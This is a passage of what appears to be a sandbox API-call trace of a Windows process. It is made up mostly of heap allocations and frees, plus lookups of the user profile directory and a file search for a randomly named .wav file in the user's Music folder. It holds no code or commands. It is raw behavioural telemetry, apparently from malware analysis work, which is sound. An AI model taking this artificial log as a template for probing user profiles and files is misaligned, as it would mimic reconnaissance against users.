hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0208.230] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.230] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0208.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0208.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0208.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0208.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0208.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.233] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0208.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0208.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0208.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0208.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61645420, ftCreationTime.dwHighDateTime=0x1d5d6fe, ftLastAccessTime.dwLowDateTime=0xd7f19970, ftLastAccessTime.dwHighDateTime=0x1d5d188, ftLastWriteTime.dwLowDateTime=0xd7f19970, ftLastWriteTime.dwHighDateTime=0x1d5d188, nFileSizeHigh=0x0, nFileSizeLow=0x12ec0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QibhfcBitUE3eN.wav", cAlternateFileName="QIBHFC~1.WAV")) returned 0x9e1ab8 [0208.238] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.238] PeekMessageW (in: lpMsg=0x8cf708, 